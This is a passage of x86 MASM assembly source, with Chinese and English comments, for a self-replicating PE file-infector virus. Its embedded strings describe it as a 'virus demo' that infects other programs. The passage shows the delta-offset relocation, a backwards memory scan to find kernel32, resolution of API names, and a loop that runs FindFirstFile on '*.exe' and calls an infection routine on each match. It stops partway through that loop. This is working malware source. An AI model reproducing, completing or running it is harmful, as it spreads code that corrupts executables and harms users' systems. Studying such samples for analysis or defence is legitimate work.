;本程序修改自hume的代码,其版权信息如下:
CopyRight db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
db " Thx for using it!",0dh,0ah
db "Contact: Humewen@21cn.com",0dh,0ah
db " humeasm.yeah.net",0dh,0ah
db "The add Code SiZe:(heX)"
;------------------------------------------------------------------------------------------------------------------------
;main.asm代码
;-----------------------------------------------------------------------------------------------------------------------
.586
.model flat, stdcall
option casemap :none ; case sensitive
include windows.inc
include user32.inc
include comctl32.inc
includelib comctl32.lib
includelib user32.lib
;;--------------
GetApiA proto :DWORD,:DWORD
;;--------------
.CODE
_Start0: ;host-side entry stub: initialise common controls, then jump into the relocatable body at __Start
invoke InitCommonControls
jmp __Start
VirusLen = vEnd-vBegin ;size in bytes of the region vBegin..vEnd (vEnd is defined later, outside this view)
vBegin: ;start of the region measured by VirusLen; data and code below are addressed as [ebp+symbol] after the delta is computed at _gd
;-----------------------------------------
include s_api.asm ;API-address lookup; presumably defines the body of GetApiA (prototyped above) and the lpApiAddrs / a* slots used at lop_get — not visible in this file
;-----------------------------------------
fsize dd ? ;file size of the target being processed (use not visible in this view)
hfile dd ? ;file handle (use not visible in this view)
hMap dd ? ;file-mapping handle (use not visible in this view)
pMem dd ? ;base of the mapped view (use not visible in this view)
;-----------------------------------------
pe_Header dd ? ;offset/pointer to the target's PE header (use not visible in this view)
sec_align dd ? ;SectionAlignment of the target (use not visible in this view)
file_align dd ? ;FileAlignment of the target (use not visible in this view)
newEip dd ? ;replacement entry point RVA (use not visible in this view)
oldEip dd ? ;original entry point RVA (use not visible in this view)
oldEipTemp dd ?
inc_size dd ? ;amount by which the file grows (use not visible in this view)
oldEnd dd ? ;original end-of-file offset (use not visible in this view)
hFind dd ? ;search handle returned by FindFirstFile (see find_start below)
sFindData WIN32_FIND_DATA <?> ;output buffer for FindFirstFile/FindNextFile (see find_start below)
readSize dd 0 ;byte count for a read (use not visible in this view)
readBuff db 10 dup(0) ;10-byte scratch buffer (use not visible in this view)
;-----------------------------------------
sFindStr db "*.exe",0 ;search pattern passed to FindFirstFile: every .exe in the current directory
sMessageBoxA db "MessageBoxA",0 ;API name to resolve by string
aMessageBoxA dd 0 ;resolved address of MessageBoxA (0 until filled in; the call that fills it is not in view)
;;temporary variables...
sztit db "病毒演示",0 ;caption text ("virus demo"); runtime data — do not edit
szMsg db "感染此病毒的程序会显示该信息",0dh,0ah ;"programs infected by this virus display this message"
db "同时具有再感染其它程序的功能",0dh,0ah ;"and can in turn infect other programs"
db "病毒代码长度:(HEX)" ;"virus code length:(HEX)" — no terminator here; the following bytes of val complete the string
val dd 0,0,0,0 ;16 zero bytes directly after szMsg; presumably receives the hex length text and its NUL (filled in elsewhere — not in view)
;;-----------------------------------------
;;-----------------------------------------
__Start:
call _gd ;push the run-time address of _gd so it can be recovered below
_gd:
pop ebp ;ebp = actual address of _gd
sub ebp,offset _gd ;ebp = delta between the assembled address and the actual load address; everything below is addressed as [ebp+symbol] because the code may run at a non-default base
mov dword ptr [ebp+appBase],ebp ;stash the delta (appBase is not defined in this view; presumably in an include)
mov eax,[esp] ;return address of the host entry point, i.e. an address inside the module that called it
xor edx,edx ;clear edx so the 16-bit load into dx below yields a clean 32-bit index
getK32Base:
dec eax ;walk backwards one byte at a time; NOTE(review): nothing checks that [eax] is mapped — a fault on an unmapped page is unhandled
mov dx,word ptr [eax+IMAGE_DOS_HEADER.e_lfanew] ;candidate e_lfanew, i.e. [eax+3ch] (the original comment said ecx; the register is eax)
test dx,0f000h ;cheap reject: DOS header + stub assumed smaller than 1000h bytes
jnz getK32Base ;speeds up the scan
cmp eax,dword ptr [eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase] ;accept only when the header's ImageBase equals the candidate base itself
jnz getK32Base
mov [ebp+k32Base],eax ;the original author takes this module to be kernel32; no name or signature check is made (k32Base is defined outside this view)
lea edi,[ebp+aGetModuleHandle] ;edi -> output table of resolved addresses; first slot is aGetModuleHandle (defined outside this view)
lea esi,[ebp+lpApiAddrs] ;esi -> zero-terminated table of name offsets (defined outside this view, presumably s_api.asm)
lop_get:
lodsd ;eax = next name offset; esi advances by 4
cmp eax,0
jz End_Get ;a 0 entry terminates the table
add eax,ebp ;relocate the name offset by the delta
push eax
push dword ptr [ebp+k32Base]
call GetApiA ;stdcall GetApiA(k32Base, name) — callee pops both args; see s_api.asm
stosd ;store the result in the next output slot; edi advances by 4
jmp lop_get
End_Get: ;execution falls through into the code pulled in by `include dislen.asm` on the next line
include dislen.asm
find_start:
lea eax,[ebp+sFindData]
push eax
lea eax,[ebp+sFindStr]
push eax
call [ebp+aFindFirstFile]
mov [ebp+hFind],eax
cmp eax,INVALID_HANDLE_VALUE
je find_exit
find_next:
call my_infect
lea eax,[ebp+sFindData]
push eax
push [ebp+hFind]